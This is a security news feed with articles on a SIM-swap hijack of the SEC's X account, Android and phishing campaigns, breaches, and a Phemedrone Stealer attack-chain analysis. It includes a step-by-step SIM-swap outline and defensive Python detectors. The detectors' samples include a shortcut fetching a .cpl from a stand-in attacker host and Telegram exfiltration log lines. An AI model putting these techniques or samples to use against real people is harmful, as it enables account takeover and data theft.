Information Security Newspaper | Hacking News (https://www.securitynewspaper.com/), feed retrieved Wed, 12 Feb 2025 18:23:34 +0000

Hacker’s Google Search Gave Him Away – You Won’t Believe What He Looked Up!
Published Wed, 12 Feb 2025 18:23:33 +0000 at https://www.securitynewspaper.com/2025/02/12/hackers-google-search-gave-him-away-you-wont-believe-what-he-looked-up/

Washington, D.C. – In a landmark case highlighting the growing cybersecurity threats to financial institutions and digital platforms, Eric Council Jr., a 25-year-old Alabama resident, has pleaded guilty to conducting a SIM-swapping attack that led to the hijacking of the U.S. Securities and Exchange Commission’s (SEC) official X (formerly Twitter) account in January 2024. His cyber intrusion enabled the posting of a fraudulent Bitcoin ETF approval announcement, momentarily influencing the cryptocurrency market before the hoax was exposed.


The Anatomy of the Attack: How Council Gained Access

SIM-Swapping: A Gateway to High-Profile Accounts

SIM-swapping, a well-documented form of social engineering, involves fraudulently transferring a victim’s phone number to a SIM card controlled by the attacker. This enables cybercriminals to bypass multi-factor authentication (MFA) mechanisms, gaining unauthorized access to digital accounts linked to the phone number.

In Council’s case, he targeted an individual responsible for managing the SEC’s social media accounts. By leveraging a fraudulent identification card, which he fabricated using an identification card printer, he impersonated the victim and successfully seized control of their cellular number.

Once in possession of the phone number, Council executed a password reset on the SEC’s X account, granting himself full control. He then transferred account access to co-conspirators, who compensated him with $50,000 in Bitcoin for his role in facilitating the breach.


The Fake Announcement & Market Manipulation

Shortly after gaining control over the SEC’s official X account, Council and his accomplices published a fabricated post falsely announcing the approval of Bitcoin Exchange-Traded Funds (ETFs). The now-infamous post read:

“Today the SEC grants approval to Bitcoin ETFs for listing on registered national security exchanges. The approved Bitcoin ETFs will be subject to ongoing surveillance and compliance measures to ensure continued investor protection.”

Given the SEC’s authoritative stance on cryptocurrency regulations, the deceptive announcement immediately triggered a spike in Bitcoin’s value, driving prices up by $1,000 in a matter of minutes. However, the celebration was short-lived, as SEC Chair Gary Gensler quickly disavowed the post, confirming that the agency’s account had been compromised. This revelation prompted a swift $2,000 drop in Bitcoin’s price, causing losses for traders who acted on the fraudulent information.

The SEC officially confirmed that a SIM-swapping attack was responsible for the breach, raising urgent concerns over the security of high-profile institutional accounts and the vulnerabilities of SMS-based authentication measures.


The Investigation: Council’s Digital Footprint Led to His Downfall

Following the incident, the FBI launched an extensive investigation, ultimately linking Council to the cyberattack. Forensic analysis of his personal computer revealed that he had conducted multiple searches relating to FBI investigations, including:

  • “What are the signs that you are under investigation by law enforcement or the FBI even if you have not been contacted by them?”
  • “How can I know for sure if I am being investigated by the FBI?”

These searches, along with evidence of his fraudulent ID card creation activities, provided authorities with sufficient grounds to arrest and charge him.


Legal Consequences: Maximum Five-Year Sentence Looms

After initially pleading not guilty, Council reversed course and pleaded guilty to charges of conspiracy to commit aggravated identity theft and access device fraud. Under federal sentencing guidelines, he faces a maximum penalty of five years in prison.

His sentencing hearing is scheduled for May 16, 2025, where the court will determine his final punishment. Given the severity of the financial impact and the national security implications, legal experts anticipate a harsh sentence to serve as a deterrent to future cybercriminals.


How a SIM-Swap Exploit Works: Technical Breakdown

1. Target Identification & Reconnaissance

  • Attackers use OSINT (Open-Source Intelligence) techniques, social media scraping, and dark web data leaks to gather personal information.
  • They look for phone numbers, email addresses, dates of birth, and security question answers from past breaches.

2. Gaining Personal Information for Social Engineering

  • Cybercriminals phish victims or buy leaked credentials to obtain date of birth, address, and account PINs.
  • If needed, they impersonate financial institutions or service providers to trick victims into revealing additional details.

3. Executing the SIM Swap with the Carrier

  • The attacker calls the victim’s mobile provider, claiming their phone was lost or stolen.
  • They use stolen personal details to verify their identity and convince customer support to transfer the phone number to a new SIM.
  • Once the swap is completed, the victim loses service, while the attacker receives their calls and messages.

4. Account Takeover & Exploitation

  • The attacker resets passwords for high-value accounts (email, crypto exchanges, financial services).
  • They intercept SMS-based two-factor authentication codes, bypassing security measures.
  • They take full control of accounts, locking out the original user and executing fraud or financial theft.

Mitigations: How to Prevent SIM-Swapping Attacks

1. Strengthen Mobile Carrier Security

✅ Set a unique PIN or passphrase with your carrier for SIM changes.
✅ Enable port-freezing or no-SIM-swap policies if your provider offers them.
✅ Link security alerts to an alternate email or authentication app.

2. Avoid SMS-Based Multi-Factor Authentication (MFA)

✅ Use app-based authenticators (Google Authenticator, Authy, Microsoft Authenticator).
✅ Prefer security keys (YubiKey, Titan Key) for high-risk accounts.

3. Monitor & Lock Personal Data

✅ Freeze your credit to prevent identity theft.
✅ Enable real-time SMS/email alerts for suspicious logins or account changes.

4. Be Aware of Phishing & Social Engineering

✅ Never share personal details over the phone unless you initiated the call.
✅ Ignore suspicious SMS links or emails claiming “account security alerts.”
✅ Regularly review security settings for sensitive accounts.


A Wake-Up Call for Cybersecurity & Financial Markets

The Council case underscores several critical cybersecurity vulnerabilities, particularly within financial institutions and regulatory bodies. It also serves as a warning that social engineering exploits, when combined with weak authentication protocols, can lead to high-impact financial fraud and market manipulation.

While individuals must take steps to protect themselves, mobile carriers, financial regulators, and social media platforms must enhance their security frameworks to reduce the risk of SIM-swapping attacks. The cryptocurrency and financial trading sectors, in particular, remain prime targets for cybercriminals seeking to exploit market movements for illicit gain.

With the SEC breach demonstrating the real-world consequences of inadequate security measures, organizations must move beyond SMS-based authentication and adopt stronger, more resilient security strategies. As cybercriminals evolve, so must the defensive measures protecting high-value targets.

The sentencing of Eric Council Jr. on May 16, 2025, will be a defining moment for law enforcement’s stance on cyber fraud—one that could shape the future of digital security policies across regulatory agencies, financial institutions, and telecommunications providers.

50,000 Users Hacked via WhatsApp!
Published Wed, 12 Feb 2025 16:07:02 +0000 at https://www.securitynewspaper.com/2025/02/12/50000-users-hacked-via-whatsapp/

A large-scale malware campaign, dubbed FatBoyPanel, is targeting Android users in India, compromising over 50,000 victims. Security researchers from Zimperium attribute this attack to a single threat actor deploying over 1,000 malicious applications. The malware is primarily distributed via WhatsApp as an APK file, masquerading as legitimate government or banking apps.

Researchers identified 900 unique samples and uncovered 2.5GB of stolen data, including sensitive banking details, government IDs, and SMS messages. The malware exfiltrates stolen data using hard-coded phone numbers, some controlled by the attacker, while others belong to compromised victims. About 63% of these numbers were traced to Indian regions.

The malware exploits SMS permissions to intercept and steal OTPs, allowing unauthorized access to banking accounts. Additionally, it employs stealth techniques such as icon hiding, uninstallation resistance, and code obfuscation. By intercepting SMS messages, it facilitates fraudulent transactions, leading to financial losses for victims.

This highlights the critical need for cybersecurity awareness, urging users to avoid installing APKs from untrusted sources and to review app permissions rigorously. Authorities and security firms are actively investigating the campaign, but users must remain vigilant against such evolving cyber threats.

Record breaking 5,600,000 megabits per second (Mbps) DDoS attack
Published Thu, 23 Jan 2025 14:10:41 +0000 at https://www.securitynewspaper.com/2025/01/23/record-breaking-5600000-megabits-per-second-mbps-ddos-attack/

In October 2024, a very powerful cyberattack was launched. This attack was a type of DDoS attack. DDoS means “Distributed Denial of Service,” where hackers use many devices to overwhelm a website or service and make it unavailable. Think of it like thousands of people trying to walk through a small door at the same time—it causes a traffic jam, and nobody can get through.

This particular attack was extremely big—it was recorded at 5.6 terabits per second. To give you an idea, that’s an enormous amount of internet traffic being used to disrupt a service. The attack targeted an internet company in East Asia. The hackers used a tool called Mirai, which is a type of malware. This malware takes over devices like cameras or routers, and in this case, it controlled around 13,000 devices to launch the attack.

The attack lasted for only 80 seconds, but it was so powerful that it set a record. Cloudflare, which helps protect websites from attacks like these, reported on January 21, 2025 that it had stopped the attack without any disruption to the service. This attack was part of a larger trend. In the last few months, Cloudflare has noticed a sharp increase in these kinds of attacks. In just one quarter, they stopped almost 7 million attacks. Some of these attacks were smaller, but many were very large, with over 420 of them being bigger than 1 terabit per second. This shows how cyberattacks are getting more frequent and more dangerous.

Phishing youtube channels and links are stealing credentials
Published Tue, 21 Jan 2025 14:50:49 +0000 at https://www.securitynewspaper.com/2025/01/21/phishing-youtube-channels-and-links-are-stealing-credentials/

Recently, cybercriminals launched a phishing attack using fake YouTube links to steal user login credentials. These links were cleverly disguised to look legitimate and used redirections through multiple websites to hide their true destination. The attack exploited a tool called the “Tycoon 2FA phishing kit,” making it capable of targeting a large number of users and even bypassing two-factor authentication (2FA). This highlights the growing sophistication of phishing campaigns and the need for extra caution while interacting with links.

How it works

  • Attackers created fake links that look like they are from YouTube. For example, the link might start with something like “hxxp[://]youtube” (instead of the usual “https://youtube”), making it seem real but hiding its true purpose.
  • When someone clicks these fake links, they are secretly redirected through multiple websites before reaching the final fake page. This makes it harder for security systems to detect the phishing attempt.
  • The final page looks like a legitimate login page, but when users enter their credentials, the attackers steal them.
  • According to researchers, this specific campaign was likely conducted by a hacking group called Storm1747. They used a tool called “Tycoon 2FA phishing kit,” which is designed for large-scale attacks and can even bypass two-factor authentication.
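
As an added example (not code from the original post or from the researchers it cites), the following Python triages a defanged lure like the one above and walks its redirect chain offline, flagging brand-in-the-wrong-place hostnames and multi-domain hops. The domains, the redirect table standing in for HTTP 3xx responses, and the two-label registered-domain shortcut are constructed assumptions.

```python
"""Triage a (possibly defanged) lure and its redirect chain for the YouTube lookalike pattern."""
import urllib.parse
from typing import Dict, List, Tuple

BRAND = "youtube"                              # brand the lure imitates (from the article)
LEGIT_DOMAINS = {"youtube.com", "youtu.be"}    # assumption: the genuine registered domains


def refang(url: str) -> str:
    """Convert defanged notation (hxxp[://]example[.]com) back into a parseable URL."""
    return (url.replace("hxxps", "https").replace("hxxp", "http")
               .replace("[://]", "://").replace("[.]", ".").replace("[:]", ":"))


def registered_domain(host: str) -> str:
    """Last two labels of the host. Simplification: ignores multi-label suffixes such as co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def classify_link(url: str) -> Tuple[str, List[str]]:
    """Return ('legitimate' | 'lookalike' | 'other', reasons) for a single link."""
    p = urllib.parse.urlparse(refang(url))
    host = (p.hostname or "").lower()
    reasons: List[str] = []
    if p.scheme != "https":
        reasons.append(f"scheme {p.scheme!r} is not https")
    if registered_domain(host) in LEGIT_DOMAINS:
        return "legitimate", reasons
    # The brand name shows up anywhere except the registered domain: the classic lookalike tricks.
    lookalike = False
    if BRAND in host:
        reasons.append(f"'{BRAND}' in hostname but registered domain is {registered_domain(host)!r}")
        lookalike = True
    if p.username and BRAND in p.username.lower():
        reasons.append("brand name placed in the userinfo part before '@'")
        lookalike = True
    if BRAND in p.path.lower():
        reasons.append("brand name appears only in the path")
        lookalike = True
    return ("lookalike" if lookalike else "other"), reasons


def follow_redirects(start: str, redirect_map: Dict[str, str], max_hops: int = 10) -> List[str]:
    """Walk an offline redirect table (stand-in for 3xx responses), stopping on loops or hop limit."""
    chain = [refang(start)]
    while chain[-1] in redirect_map and len(chain) <= max_hops:
        nxt = redirect_map[chain[-1]]
        if nxt in chain:            # redirect loop
            break
        chain.append(nxt)
    return chain


def analyze_link(start: str, redirect_map: Dict[str, str]) -> Dict[str, object]:
    """Classify every hop; flag the chain if any hop is a lookalike or it bounces across 3+ domains."""
    chain = follow_redirects(start, redirect_map)
    verdicts = [classify_link(u)[0] for u in chain]
    domains = {registered_domain(urllib.parse.urlparse(u).hostname or "") for u in chain}
    flagged = "lookalike" in verdicts or len(domains) >= 3
    return {"chain": chain, "verdicts": verdicts, "domains_crossed": len(domains), "flagged": flagged}


# Constructed sample: a defanged lure as an analyst would receive it, plus the hops it bounced through.
SAMPLE_LURE = "hxxp[://]youtube[.]com-watch[.]example/v/abc123"
SAMPLE_REDIRECTS = {
    "http://youtube.com-watch.example/v/abc123": "https://shortlink.example/r/7f3a",
    "https://shortlink.example/r/7f3a": "https://login-verify.example/session",
}

if __name__ == "__main__":
    print(analyze_link(SAMPLE_LURE, SAMPLE_REDIRECTS))
```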

How to protect

  • Verify Links Before Clicking: Always check if a link is legitimate by hovering over it to see the full URL. Avoid clicking on suspicious or shortened links.
  • Enable 2FA: Use two-factor authentication for all accounts, but be cautious of phishing attempts designed to bypass it.
  • Use Antivirus and Anti-Phishing Tools: Install security software that can detect and block phishing sites.
  • Educate Yourself and Others: Stay informed about the latest phishing tactics and share this knowledge with family and colleagues.
  • Report Suspicious Activity: If you encounter a fake link or phishing attempt, report it to the website or service it claims to represent.

Are You Affected? American Express Credit Cards Compromised in Data Leak at a third-party service provider
Published Mon, 04 Mar 2024 20:30:23 +0000 at https://www.securitynewspaper.com/2024/03/04/are-you-affected-american-express-credit-cards-compromised-in-massive-data-leak/

In a recent unsettling development, American Express has confirmed that sensitive information related to its credit cards has been compromised due to a data breach at a third-party service provider. This incident has raised serious concerns about the security of financial data and the implications for customers worldwide.

The Breach Explained

The breach was reportedly executed by a third-party merchant processor, which inadvertently allowed the sensitive information of American Express cardholders to leak onto the dark web. This exposed data includes American Express Card account numbers, expiration dates, and possibly other personal information, putting customers at risk of fraud and identity theft.

American Express has been proactive in addressing the situation, notifying affected customers and urging them to remain vigilant for signs of unauthorized activity on their accounts. Despite the breach, American Express has emphasized that its own systems were not compromised, pointing to the external nature of the security lapse.

Impact on Customers

The exposure of credit card details in a third-party data breach is a stark reminder of the vulnerabilities that exist within the digital financial ecosystem. For customers, this incident underscores the importance of monitoring their financial statements regularly and reporting any suspicious transactions immediately.

American Express has assured its customers that it is taking the necessary steps to mitigate the impact of the breach. This includes offering free credit monitoring services to affected individuals to help protect their financial information from further misuse.

Industry-Wide Concerns

This incident is not isolated, as data breaches involving third-party service providers have become increasingly common. The reliance on external vendors for processing financial transactions and handling sensitive data introduces additional risks that companies must manage. It highlights the need for stringent security measures and continuous vigilance to protect against cyber threats.

Moving Forward

In response to the breach, American Express and other financial institutions are likely to reassess their relationships with third-party vendors and enhance their security protocols to prevent similar incidents in the future. This may involve more rigorous vetting processes, the implementation of advanced cybersecurity technologies, and closer collaboration between companies and their service providers to ensure the highest standards of data protection.

For customers, the breach serves as a critical reminder of the need to be proactive in safeguarding their personal and financial information. This includes using strong, unique passwords for online accounts, enabling two-factor authentication where available, and being cautious of phishing attempts and other online scams.

The exposure of American Express credit card details in a third-party data breach is a concerning event that highlights the ongoing challenges in securing financial data. As the digital landscape evolves, so too do the tactics of cybercriminals, making it imperative for both companies and consumers to remain vigilant and proactive in their cybersecurity efforts. American Express’s commitment to addressing the breach and supporting its customers is a positive step, but it also serves as a call to action for the industry to strengthen its defenses against future threats.

Update from American Express

The incidents that you are inquiring about occurred at a merchant or merchant processor and were not an attack on American Express or an American Express service provider, as some media outlets have erroneously reported. Because customer data was impacted, American Express provided notice of the incidents to Massachusetts agencies and impacted customers who reside in Massachusetts.

American Express Card Members are not liable for fraudulent charges on their accounts. We have sophisticated monitoring systems and internal safeguards in place to help detect fraudulent and suspicious activity. If we see there is unusual activity that may be fraud, we will take protective actions. We also recommend customers regularly review and monitor their account activity, and immediately contact us if they detect any suspicious activity. For added protection, customers can receive free fraud and account activity alerts via email, SMS text messaging, and/or notifications through our app.

This blog post on the Massachusetts state website may shed a little more light on the different circumstances under which financial institutions may report incidents. For example, a financial institution may report an incident that occurred at a retailer where the consumer used their bank-issued card.

How AnyDesk’s Latest Hack Could Affect You and What to Do Next
Published Mon, 05 Feb 2024 20:23:33 +0000 at https://www.securitynewspaper.com/2024/02/05/how-anydesks-latest-hack-could-affect-you-and-what-to-do-next/

In a recent security update, AnyDesk, a renowned remote desktop software provider, disclosed a security breach affecting its production systems. The company swiftly initiated a thorough security audit upon detecting signs of the incident, which revealed the compromise. To address the situation, AnyDesk engaged cybersecurity specialists from CrowdStrike, launching an extensive remediation and response plan that has since been successfully concluded.

Immediate Actions and Remediation

Understanding the gravity of the situation, AnyDesk took decisive steps to mitigate the impact of the breach. The company has informed relevant authorities about the incident and is collaborating closely with them to ensure a comprehensive response. Notably, the incident was clarified not to be related to ransomware, which often targets such essential services for extortion purposes.

In a proactive move to secure its systems and user data, AnyDesk has revoked all security-related certificates. This step is crucial in preventing any further unauthorized access using the compromised credentials. The company is also in the process of revoking its previous code signing certificate for binaries, transitioning to a new certificate to ensure the integrity of its software.

Safeguarding User Data and Recommendations

AnyDesk reassures its users that its systems are architecturally designed to avoid storing sensitive information like private keys, security tokens, or passwords that could potentially be used to access end-user devices. This design philosophy is pivotal in limiting the potential exploitation scope of such breaches.

As an additional precautionary measure, AnyDesk is revoking all passwords to its web portal, my.anydesk.com. Users are strongly encouraged to change their passwords, especially if the same credentials are used across multiple platforms. This recommendation aims to prevent any possibility of credential stuffing attacks, where attackers use stolen credentials to gain unauthorized access to other accounts.

Moving Forward

AnyDesk’s swift and transparent response to the security breach underscores its commitment to user security and trust. By involving industry-leading cybersecurity experts and working closely with law enforcement, AnyDesk demonstrates its dedication to maintaining the highest security standards.

The incident serves as a reminder of the persistent cybersecurity threats facing remote access software providers and the importance of robust security measures. AnyDesk’s actions following the breach provide a blueprint for effective incident response and remediation, reinforcing the security of its systems against future threats.

Users and stakeholders are advised to stay tuned to official AnyDesk communications for further updates and recommendations on safeguarding their accounts and data.

How to exploit Windows Defender Antivirus to infect a device with malware
Published Mon, 15 Jan 2024 22:15:36 +0000 at https://www.securitynewspaper.com/2024/01/15/how-to-exploit-windows-defender-antivirus-to-infect-a-device-with-malware/

Trend Micro’s recent threat hunting efforts have uncovered active exploitation of CVE-2023-36025, a vulnerability in Microsoft Windows Defender SmartScreen, by a new strain of malware known as Phemedrone Stealer. This malware targets web browsers, cryptocurrency wallets, and messaging apps like Telegram, Steam, and Discord, stealing data and sending it to attackers via Telegram or command-and-control servers. Phemedrone Stealer, an open-source stealer written in C#, is actively maintained on GitHub and Telegram.

CVE-2023-36025 arises from insufficient checks on Internet Shortcut (.url) files, allowing attackers to bypass Windows Defender SmartScreen warnings by using crafted .url files that download and execute malicious scripts. Microsoft patched this vulnerability on November 14, 2023, but its exploitation in the wild led to its inclusion in the Cybersecurity and Infrastructure Security Agency’s Known Exploited Vulnerabilities list. Various malware campaigns, including those distributing Phemedrone Stealer, have since incorporated this vulnerability.

Initial Access via Cloud-Hosted Malicious URLs

According to the report, initial access relies on malicious cloud-hosted URLs. Attackers host malicious Internet Shortcut files on platforms like Discord or cloud services, often disguised using URL shorteners. Unsuspecting users who open these files trigger the exploitation of CVE-2023-36025.

Defense Evasion Tactics

The malicious .url file downloads and executes a control panel item (.cpl) file from an attacker-controlled server. This bypasses the usual security prompt from Windows Defender SmartScreen. The malware employs MITRE ATT&CK technique T1218.002, using the Windows Control Panel process binary to execute .cpl files, which are essentially DLL files.

  1. Initial Infection via Malicious .url File (CVE-2023-36025): The attack begins when a user executes a malicious Internet Shortcut (.url) file. This file is designed to bypass Microsoft Windows Defender SmartScreen warnings, typically triggered for files from untrusted sources. The evasion is likely achieved by manipulating the file’s structure or content, making it appear benign.
  2. Execution of a Control Panel Item (.cpl) File: Once executed, the .url file connects to an attacker-controlled server to download a .cpl file. In Windows, .cpl files are used to execute Control Panel items and are essentially Dynamic Link Libraries (DLLs). This step involves the MITRE ATT&CK technique T1218.002, which exploits the Windows Control Panel process binary (control.exe) to execute .cpl files.
  3. Use of rundll32.exe for DLL Execution: The .cpl file, when executed through control.exe, then calls rundll32.exe, a legitimate Windows utility used to run functions stored in DLL files. This step is critical as it uses a trusted Windows process to execute the malicious DLL, further evading detection.
  4. PowerShell Utilization for Payload Download and Execution: The malicious DLL acts as a loader to call Windows PowerShell, a task automation framework. PowerShell is then used to download and execute the next stage of the attack from GitHub.
  5. Execution of DATA3.txt PowerShell Loader: The file DATA3.txt, hosted on GitHub, is an obfuscated PowerShell script designed to be difficult to analyze statically (i.e., without executing it). It uses string and digit manipulation to mask its true intent.
  6. Deobfuscation and Execution of the GitHub-Hosted Loader: Through a combination of static and dynamic analysis, the obfuscated PowerShell commands within DATA3.txt can be deobfuscated. This script is responsible for downloading a ZIP file from the same GitHub repository.
  7. Contents of the Downloaded ZIP File:
    • WerFaultSecure.exe: A legitimate Windows Fault Reporting binary.
    • Wer.dll: A malicious binary that is sideloaded (executed in the context of a legitimate process) when WerFaultSecure.exe is run.
    • Secure.pdf: An RC4-encrypted second-stage loader, presumably containing further malicious code.

This attack is sophisticated, using multiple layers of evasion and leveraging legitimate Windows processes and binaries to conceal malicious activities. The use of GitHub as a hosting platform for malicious payloads is also noteworthy, as it can lend an appearance of legitimacy and may bypass some network-based security controls.
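
An added example, not code from Trend Micro or from the article: a small Python triage that parses an Internet Shortcut (.url) file and flags the pattern described in steps 1 and 2 above, a target on a remote share or fetched from a server that is a code-executing file such as a .cpl. The sample shortcut texts and hostnames are constructed, and the list of code-executing extensions is an assumption.

```python
"""Flag Internet Shortcut (.url) files whose target is a remote share or a code-executing file."""
import configparser
import os
import urllib.parse
from dataclasses import dataclass, field
from typing import List, Optional

# Extensions that run code when a shortcut points at them instead of opening a document (assumption).
EXECUTABLE_EXTS = {".cpl", ".exe", ".dll", ".scr", ".hta", ".js", ".vbs", ".ps1", ".bat", ".cmd"}


@dataclass
class UrlVerdict:
    target: str
    remote_share: bool       # file:// with a host, or a UNC path: loaded from another machine
    network_fetch: bool      # http(s)/ftp: fetched from a web server
    extension: str
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_internet_shortcut(text: str) -> Optional[str]:
    """Return the URL= value of the [InternetShortcut] section (INI syntax), or None if absent."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(text.lstrip("\ufeff"))      # tolerate a UTF-8 BOM
    except configparser.Error:
        return None
    for section in cp.sections():
        if section.lower() == "internetshortcut":
            url = cp[section].get("url")            # option names are case-insensitive here
            return url.strip() if url else None
    return None


def triage_target(target: str) -> UrlVerdict:
    """Classify where the shortcut target lives and whether opening it executes code."""
    t = target.strip()
    unc = t.startswith("\\\\")                      # \\host\share\file style path
    p = urllib.parse.urlparse(t.replace("\\", "/") if unc else t)
    scheme = p.scheme.lower()
    host = (p.hostname or "").lower()
    remote_share = unc or (scheme == "file" and host not in ("", "localhost"))
    network_fetch = scheme in ("http", "https", "ftp")
    ext = os.path.splitext(p.path)[1].lower()
    reasons: List[str] = []
    if remote_share:
        reasons.append(f"target lives on a remote file share ({host})")
    if ext in EXECUTABLE_EXTS and (remote_share or network_fetch):
        reasons.append(f"target extension {ext} executes code and is fetched from {host}")
    elif ext in EXECUTABLE_EXTS:
        reasons.append(f"target extension {ext} executes code")
    return UrlVerdict(t, remote_share, network_fetch, ext, reasons)


def scan_url_file(text: str) -> Optional[UrlVerdict]:
    """Parse a .url file's text and triage its target; None when it is not a valid shortcut."""
    target = parse_internet_shortcut(text)
    return triage_target(target) if target else None


# Constructed samples (not real indicators): the remote-.cpl pattern from the report, and a benign link.
SAMPLE_REMOTE_CPL = "[InternetShortcut]\nURL=file://files.attacker.example/share/update.cpl\nIconIndex=0\n"
SAMPLE_UNC_CPL = "[InternetShortcut]\nURL=\\\\files.attacker.example\\share\\update.cpl\n"
SAMPLE_BENIGN = "[InternetShortcut]\nURL=https://www.example.org/docs/report.html\n"

if __name__ == "__main__":
    for sample in (SAMPLE_REMOTE_CPL, SAMPLE_UNC_CPL, SAMPLE_BENIGN):
        print(scan_url_file(sample))
```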

Persistence and DLL Sideloading

The malware achieves persistence by creating scheduled tasks and uses DLL sideloading techniques. The malicious DLL, crucial for the loader’s functionality, decrypts and runs the second stage loader. It uses dynamic API resolving and XOR-based algorithms for string decryption, complicating reverse engineering efforts.

  1. Malicious DLL (wer.dll) Functionality: It decrypts and runs a second-stage loader. To avoid detection and hinder reverse engineering, it employs API hashing, string encryption, and is protected by VMProtect.
  2. DLL Sideloading Technique: The malware deceives the system into loading the malicious wer.dll by placing it in the application directory, a method that exploits the trust Windows has in its own directories.
  3. Dynamic API Resolving: To avoid detection by static analysis tools, the malware uses CRC-32 hashing for storing API names, importing them dynamically during runtime.
  4. XOR-based String Decryption: An algorithm is used to decrypt strings, with each byte’s key generated based on its position. This method is designed to complicate automated decryption efforts.
  5. Persistence Mechanism: The malware creates a scheduled task to regularly execute WerFaultSecure.exe. This ensures that the malware remains active on the infected system.
  6. Second-Stage Loader (secure.pdf): It’s decrypted using an undocumented function from advapi32.dll, with memory allocation and modification handled by functions from Activeds.dll and VirtualProtect.
  7. Execution Redirection through API Callbacks: The malware cleverly redirects execution flow to the second-stage payload using Windows API callback functions, particularly exploiting the CryptCATCDFOpen function.

Overall, this malware demonstrates a deep understanding of Windows internals, using them to its advantage to stay hidden and maintain persistence on the infected system. The combination of techniques used makes it a complex and dangerous threat.

Second-Stage Defense Evasion

The second-stage loader is Donut, an open-source shellcode generator and loader that executes several file types directly in memory. In this campaign the embedded payload is encrypted but not compressed, and Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime into the host process and create a new Application Domain in which the .NET assembly runs. Here is an overview of how Donut is used for defense evasion and payload execution:

  1. Donut Shellcode Loader:
    • Capabilities: Allows execution of VBScript, JScript, EXE files, DLL files, and .NET assemblies directly in memory.
    • Deployment Options: Can be embedded into the loader or staged from an HTTP or DNS server. In this case, it’s embedded directly into the loader.
  2. Payload Compression and Encryption:
    • Compression Techniques: Supports aPLib, LZNT1, Xpress, and Xpress Huffman through RtlCompressBuffer.
    • Encryption: Uses the Chaskey block cipher for payload encryption. In this instance, only encryption is used, without compression.
  3. Execution Process via Unmanaged CLR Hosting API:
    • CLR Loading: Donut is configured to use the Unmanaged CLR Hosting API to load the Common Language Runtime (CLR) into the host process.
    • Application Domain Creation: Creates a new Application Domain, allowing assemblies to run in disposable AppDomains.
    • Assembly Loading and Execution: Once the AppDomain is prepared, Donut loads the .NET assembly and invokes the payload’s entry point.

The use of Donut in this attack is notable because it executes code of several types directly in memory, leaving little on disk for file-based scanners to inspect. Memory-only execution combined with an encrypted payload also makes the final stage harder to capture and analyse. Running the assembly in a fresh AppDomain lets Donut discard that domain after execution rather than leaving the assembly resident in the process's default domain, which reduces what a later memory inspection will find. The technique is not invisible, however: loading the CLR into a process that does not normally host managed code, such as WerFaultSecure.exe, is itself a strong signal, and image-load telemetry for clr.dll or mscoree.dll appearing in unexpected processes is a practical way to catch it.

Phemedrone Stealer Payload Analysis

Phemedrone Stealer starts by initialising its configuration and decrypting embedded items such as the Telegram API token with the .NET RijndaelManaged symmetric cipher (Rijndael, the algorithm standardised as AES). It then harvests sensitive data from a wide range of sources: Chromium-based browsers, Gecko-based browsers, cryptocurrency wallets, Discord, FileZilla, Steam, Telegram, and system information, plus a FileGrabber module that collects user files from the machine.

Command and Control for Data Exfiltration

After collection the stealer compresses everything into a ZIP archive, validates its Telegram bot API token, and then exfiltrates the archive together with system information and statistics through the Telegram API. Although Microsoft has patched CVE-2023-36025, unpatched systems remain exposed and threat actors continue to abuse the flaw to bypass Windows Defender SmartScreen. The Phemedrone Stealer campaign shows why vigilance and timely patching matter against threats that move this quickly from disclosure to exploitation.
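As an added example (not part of the article), the following Python detection pass turns the exfiltration step into something a SOC can run over proxy logs. It scans constructed sample lines (not real traffic) for Telegram Bot API requests and reports hosts that uploaded a document with sendDocument, raising the severity when the same bot token was also checked with getMe, which is assumed here to be the token-validation call; the article only says the token is validated. Bot tokens are assumed to have the form <bot-id>:<secret>, and only the numeric bot id is reported so findings can be shared without leaking the token.

```python
"""Detect validate-then-upload Telegram Bot API activity in proxy logs.

Added example, not code from the article. The log lines are constructed;
the token format (<bot-id>:<secret>) and the use of /getMe as the
validation call are assumptions.
"""
import re
from collections import defaultdict

# Constructed sample lines: "<timestamp> <src_host> <verb> <url> <status>".
SAMPLE_PROXY_LOG = """\
2024-01-15T10:02:11Z WS-0417 GET https://api.telegram.org/bot7123456789:AAHsomeSecretPartXXXXXXXXXXXXXXXXXX/getMe 200
2024-01-15T10:02:12Z WS-0417 POST https://api.telegram.org/bot7123456789:AAHsomeSecretPartXXXXXXXXXXXXXXXXXX/sendMessage 200
2024-01-15T10:02:14Z WS-0417 POST https://api.telegram.org/bot7123456789:AAHsomeSecretPartXXXXXXXXXXXXXXXXXX/sendDocument 200
2024-01-15T10:03:01Z WS-0099 GET https://web.telegram.org/a/ 200
2024-01-15T10:04:40Z WS-0512 POST https://api.telegram.org/bot5550001111:AAGanotherSecretYYYYYYYYYYYYYYYYYYYY/sendDocument 200
"""

# Bot API URLs embed the token in the path: /bot<bot-id>:<secret>/<method>
BOT_API_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)"
)
LINE_RE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<host>\S+)\s+(?P<verb>\S+)\s+(?P<url>\S+)\s+(?P<status>\d+)$"
)


def parse_bot_api_calls(log_text):
    """Return (timestamp, host, bot_id, method) for every Bot API request.

    The secret half of the token is matched so the URL parses, but it is
    deliberately not returned.
    """
    calls = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        api = BOT_API_RE.match(m["url"])
        if api:
            calls.append((m["ts"], m["host"], api["bot_id"], api["method"]))
    return calls


def find_exfil_candidates(log_text):
    """Flag (host, bot_id) pairs that uploaded a document.

    Severity is 'high' when the same token was also checked with getMe,
    matching the validate-then-exfiltrate sequence; otherwise 'medium'.
    """
    seen = defaultdict(set)
    for _, host, bot_id, method in parse_bot_api_calls(log_text):
        seen[(host, bot_id)].add(method)

    findings = []
    for (host, bot_id), methods in sorted(seen.items()):
        if "sendDocument" in methods:
            findings.append({
                "host": host,
                "bot_id": bot_id,
                "severity": "high" if "getMe" in methods else "medium",
                "methods": sorted(methods),
            })
    return findings


if __name__ == "__main__":
    for finding in find_exfil_candidates(SAMPLE_PROXY_LOG):
        print(finding)
```

Feed it real proxy or DNS-plus-TLS-SNI logs by adapting LINE_RE to the log format; the Bot API pattern itself is the same. Any sendDocument from an endpoint that has no business running a Telegram bot is worth a triage ticket on its own, and the getMe pairing is what distinguishes a stealer's first beacon from a legitimate automation that has been running for months.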

Mitigation

